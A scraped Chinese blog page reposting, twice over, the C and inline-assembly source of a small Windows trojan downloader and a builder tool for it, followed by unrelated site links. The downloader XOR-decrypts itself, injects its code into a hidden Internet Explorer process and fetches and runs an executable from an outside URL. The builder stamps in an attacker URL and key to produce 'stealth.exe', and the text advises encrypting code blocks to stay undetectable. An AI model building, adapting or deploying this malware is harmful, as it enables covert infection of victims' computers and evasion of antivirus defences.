3K下载者.txt
来源:互联网 发布:网络暴力案例 编辑:程序博客网 时间:2024/04/18 05:58
/*
"mini_downloader"
code bykardinal p.s.t
Edited by stealthwalker
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/OPT:NOWIN98") //make the EXE file to be 2.5k size
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //create remote thread,and run
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;
void download() //thread funciton to be injected to IE
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //main function
{
//1.get IE path ,and run it
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.get IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.allocate memory
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//image base address
//image size
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.write to memory,create thread
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //create remote thread and run
//5.clean
CloseHandle(processhandle);
return;
};
//decryption function
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//store the original data to shellcode
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
rep movsb;
popad;
};
//decrypt
//int i;
//for (i=1;i<=0xFF;i++)
//{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov edx,0x2c;
xor al,dl;
stosb;
dec ecx;
jne en2;
popad;
};//end asm
__try
{
main();
//MessageBox(NULL,"ok","ok",MB_OK);
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// OutputDebugString("ERRor hehe");
// MessageBox(NULL,"error","a",MB_OK);
};
//}// end for i
return;
};
[Copy to clipboard]
i modified some snippets of it,especially the decrypt function.i removed the for cycle in order to make itself xor one time. i think you can do many things to customize the code to fit in with specific mission.for example, you can use shellcoding methods to add a decode block to the front of decoded data in order to work well, or ,randomly encrypt any block of the main code to make it undetectable.
Pay attention,the code above can not be launched as a stand-alone program.in other words,you must encrypt the download() and main() functions manually before it is launched.In order to make it easily done,i coded a SIMPLE program --a generator with c.
CODE:
#include <windows.h>
#include <stdio.h>
#include "resource.h"
HWND hDlg;
char url[76];
char key[3];
unsigned char nkey;
//convert string to bytes,borrowed from the internet
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
for(int i=0; i<nSrcLength; i+=2)
{
if(*pSrc>='0' && *pSrc<='9')
{
*pDst = (*pSrc - '0') << 4;
}
else
{
*pDst = (*pSrc - 'A' + 10) << 4;
}
pSrc++;
if(*pSrc>='0' && *pSrc<='9')
{
*pDst |= *pSrc - '0';
}
else
{
*pDst |= *pSrc - 'A' + 10;
}
pSrc++;
pDst++;
}
return nSrcLength / 2;
}
BOOL CheckKey(void)
{
if(((key[0]>='0' && key[0]<='9')||(key[0]>='a' && key[0]<='f'))&&((key[1]>='0' && key[1]<='9')||(key[1]>='a' &&
key[1]<='f')))
{
if((key[0]=='0' && key[1]=='0')||(key[0]=='f' && key[1]=='f'))
return false;
else
return true;
}
else
return false;
}
void WINAPI MakeDlExe(void)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
if (NULL == hResInfo)
{
MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
dwSize = SizeofResource(NULL, hResInfo);
// Load Resource
hResData = LoadResource(NULL, hResInfo);
if (NULL == hResData)
{
MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
// Allocate Memory
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
{
MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
//duplicate resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
//TO customize the resource data
String2Bytes(key,&nkey,2);
CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
//for (i=1;i<0xff;i++)
//{
_asm{
push p
pop esi
add esi,0x360
push esi
pop edi
mov ecx,0x550
sub ecx,0x360
mov bl,nkey
loop1:
lodsb
xor al,bl
stosb
dec ecx
jne loop1
}
// }
//store the customized data to file
hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
if (hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
}
else
{
MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
GlobalFree((HGLOBAL)p);
}
// release resources
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
}
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hDlg = hwndDlg;
LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
SetDlgItemText(hDlg,IDC_EDIT1,"http://www.r00tme.net/test.exe");
SetDlgItemText(hDlg,IDC_EDIT2,"2e");
SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
break;
case WM_CLOSE:
EndDialog(hDlg, 0);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
if (LOWORD(wParam) == IDC_BUTTON1)
{
ZeroMemory(url,MAX_PATH);
GetDlgItemText(hDlg,IDC_EDIT1,url,76);
GetDlgItemText(hDlg,IDC_EDIT2,key,3);
if(CheckKey())
MakeDlExe();
else
MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
}
if (LOWORD(wParam) == IDC_BUTTON2)
{
EndDialog(hDlg, 0);
}
break;
}
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
return 0;
}
[Copy to clipboard]
the resource .h file:
CODE:
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1 101
#define IDI_ICON1 102
#define IDR_SERVER1 103
#define IDC_EDIT1 1000
#define IDC_BUTTON1 1001
#define IDC_BUTTON2 1002
#define IDC_EDIT2 1003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 108
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1004
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
"mini_downloader"
code bykardinal p.s.t
Edited by stealthwalker
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/OPT:NOWIN98") //make the EXE file to be 2.5k size
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//ShellExecuteA
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//UrlDownloadToFileA
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //create remote thread,and run
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;
void download() //thread funciton to be injected to IE
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeee ... eeeeeeeeen/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //main function
{
//1.get IE path ,and run it
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.get IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.allocate memory
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//image base address
//image size
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.write to memory,create thread
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//write data
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //create remote thread and run
//5.clean
CloseHandle(processhandle);
return;
};
//decryption function
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//store the original data to shellcode
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
rep movsb;
popad;
};
//decrypt
//int i;
//for (i=1;i<=0xFF;i++)
//{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov edx,0x2c;
xor al,dl;
stosb;
dec ecx;
jne en2;
popad;
};//end asm
__try
{
main();
//MessageBox(NULL,"ok","ok",MB_OK);
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
// OutputDebugString("ERRor hehe");
// MessageBox(NULL,"error","a",MB_OK);
};
//}// end for i
return;
};
[Copy to clipboard]
i modified some snippets of it,especially the decrypt function.i removed the for cycle in order to make itself xor one time. i think you can do many things to customize the code to fit in with specific mission.for example, you can use shellcoding methods to add a decode block to the front of decoded data in order to work well, or ,randomly encrypt any block of the main code to make it undetectable.
Pay attention,the code above can not be launched as a stand-alone program.in other words,you must encrypt the download() and main() functions manually before it is launched.In order to make it easily done,i coded a SIMPLE program --a generator with c.
CODE:
#include <windows.h>
#include <stdio.h>
#include "resource.h"
HWND hDlg;
char url[76];
char key[3];
unsigned char nkey;
//convert string to bytes,borrowed from the internet
int String2Bytes(const char* pSrc, unsigned char* pDst, int nSrcLength)
{
for(int i=0; i<nSrcLength; i+=2)
{
if(*pSrc>='0' && *pSrc<='9')
{
*pDst = (*pSrc - '0') << 4;
}
else
{
*pDst = (*pSrc - 'A' + 10) << 4;
}
pSrc++;
if(*pSrc>='0' && *pSrc<='9')
{
*pDst |= *pSrc - '0';
}
else
{
*pDst |= *pSrc - 'A' + 10;
}
pSrc++;
pDst++;
}
return nSrcLength / 2;
}
BOOL CheckKey(void)
{
if(((key[0]>='0' && key[0]<='9')||(key[0]>='a' && key[0]<='f'))&&((key[1]>='0' && key[1]<='9')||(key[1]>='a' &&
key[1]<='f')))
{
if((key[0]=='0' && key[1]=='0')||(key[0]=='f' && key[1]=='f'))
return false;
else
return true;
}
else
return false;
}
void WINAPI MakeDlExe(void)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SERVER1), "SERVER");
if (NULL == hResInfo)
{
MessageBox(hDlg, "Failed in searching for resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
dwSize = SizeofResource(NULL, hResInfo);
// Load Resource
hResData = LoadResource(NULL, hResInfo);
if (NULL == hResData)
{
MessageBox(hDlg, "Failed in Loading Resource!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
// Allocate Memory
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL)
{
MessageBox(hDlg, "Failed in Allocating Memory!", "ERROR", MB_OK | MB_ICONINFORMATION);
return;
}
//duplicate resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
//TO customize the resource data
String2Bytes(key,&nkey,2);
CopyMemory((LPVOID)(p + 0x258), (LPCVOID)url, 76);
CopyMemory((LPVOID)(p + 0x5d7), (LPCVOID)&nkey, 1);
//for (i=1;i<0xff;i++)
//{
_asm{
push p
pop esi
add esi,0x360
push esi
pop edi
mov ecx,0x550
sub ecx,0x360
mov bl,nkey
loop1:
lodsb
xor al,bl
stosb
dec ecx
jne loop1
}
// }
//store the customized data to file
hFile = CreateFile("stealth.exe", GENERIC_WRITE, 0, NULL, Create_ALWAYS, 0, NULL);
if (hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL);
MessageBox(hDlg, "Built Successfully!", "HINT", MB_OK);
}
else
{
MessageBox(hDlg, "Failed in Building File!", "ERROR", MB_OK | MB_ICONINFORMATION);
GlobalFree((HGLOBAL)p);
}
// release resources
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
}
LRESULT DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hDlg = hwndDlg;
LoadIcon(NULL,(LPCTSTR)IDI_ICON1);
SetDlgItemText(hDlg,IDC_EDIT1,"http://www.r00tme.net/test.exe");
SetDlgItemText(hDlg,IDC_EDIT2,"2e");
SendDlgItemMessage(hDlg,IDC_EDIT1,EM_SETLIMITTEXT,76,0);
SendDlgItemMessage(hDlg,IDC_EDIT2,EM_SETLIMITTEXT,2,0);
break;
case WM_CLOSE:
EndDialog(hDlg, 0);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
case WM_COMMAND:
if (LOWORD(wParam) == IDC_BUTTON1)
{
ZeroMemory(url,MAX_PATH);
GetDlgItemText(hDlg,IDC_EDIT1,url,76);
GetDlgItemText(hDlg,IDC_EDIT2,key,3);
if(CheckKey())
MakeDlExe();
else
MessageBox(hDlg,"Failed in xor Key!","ERROR",MB_OK);
}
if (LOWORD(wParam) == IDC_BUTTON2)
{
EndDialog(hDlg, 0);
}
break;
}
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
DialogBox(hInstance, (LPCTSTR)IDD_DIALOG1, 0, (DLGPROC)DialogProc);
return 0;
}
[Copy to clipboard]
the resource .h file:
CODE:
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Script1.rc
//
#define IDD_DIALOG1 101
#define IDI_ICON1 102
#define IDR_SERVER1 103
#define IDC_EDIT1 1000
#define IDC_BUTTON1 1001
#define IDC_BUTTON2 1002
#define IDC_EDIT2 1003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 108
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1004
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
- 3K下载者.txt
- 3k穿墙下载者VC源代码
- jsp下载txt/execl
- .txt文件的下载
- 盾击txt免费下载
- 下载txt文件
- txt文件下载
- 自定义TxT文档下载
- java下载txt
- PHP 下载txt文件
- php点击下载txt文件
- php点击下载txt文件
- .xls .txt文件生成下载
- jsp页面下载txt文件
- PHP 下载txt文件 功能
- MIME让TXT可下载
- txt文档下载另存为解决
- 卡巴斯基反病毒软件 (k 下载
- BugFree2.0安装教程汇总
- XTrap驱动分析
- 关于HOOK截入中文输入
- 列出集合A={x|x∈Z,1≤x≤n}的r元子集
- VipShell驱动隐藏模块
- 3K下载者.txt
- 心路
- E文积累_20080322_minutes
- CSDN下载频道积分2.0
- NND,今天真倒霉
- MFC应用程序中处理消息的顺序,创建窗口的过程关闭窗口的顺序(非模态窗口),打开模式对话框的函数调用顺序
- 拖动对话框,如何限制拖动大小
- 常用的Struts 2.0的标志(Tag)介绍
- Traits of the blood types